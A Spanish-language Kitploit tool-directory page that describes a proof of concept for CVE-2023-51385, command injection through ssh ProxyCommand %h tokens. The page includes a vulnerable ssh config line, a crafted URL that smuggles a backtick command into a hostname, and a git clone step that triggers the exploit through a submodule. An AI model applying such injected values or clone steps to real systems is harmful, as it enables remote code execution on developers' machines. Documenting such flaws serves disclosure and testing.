Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc-proxycommand-vulnerable — Prueba de concepto para explotar configuraciones de proxycommand vulnerables en clientes ssh (CVE-2023-51385) | Kitploit
Herramientas/GitHubGitHub/vin01/poc-proxycommand-vulnerable
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónMovimiento LateralComando y ControlHerramienta de Acceso Remoto
GitHubvin01/poc-proxycommand-vulnerable

poc-proxycommand-vulnerable

Prueba de concepto para explotar configuraciones de proxycommand vulnerables en clientes ssh (CVE-2023-51385)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver RepositorioSitio web
5038hace 2 añosRevisado por Kitploit

RCE mediante ~/.ssh/config inseguro

El uso de tokens como %h, %p en ProxyCommand es bastante popular para utilizar túneles y proxy de conexión mediante SSH.

Configuración vulnerable

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

Nota: en mi evaluación inicial tenía la impresión de que usar '%h` (comillas simples) evitaría esto, pero parece que eso sigue siendo vulnerable con algo como:

root@kitploit:~
url = ssh://'`open -aCalculator`'foo.example.com/bar

Tomado de: https://man.openbsd.org/ssh_config#ProxyCommand

Qué hay en este repositorio

Un submódulo que explotaría esta vulnerabilidad para abrir una calculadora en OSX.

Pruébalo usando:

git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules

o

git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules

Descargar herramienta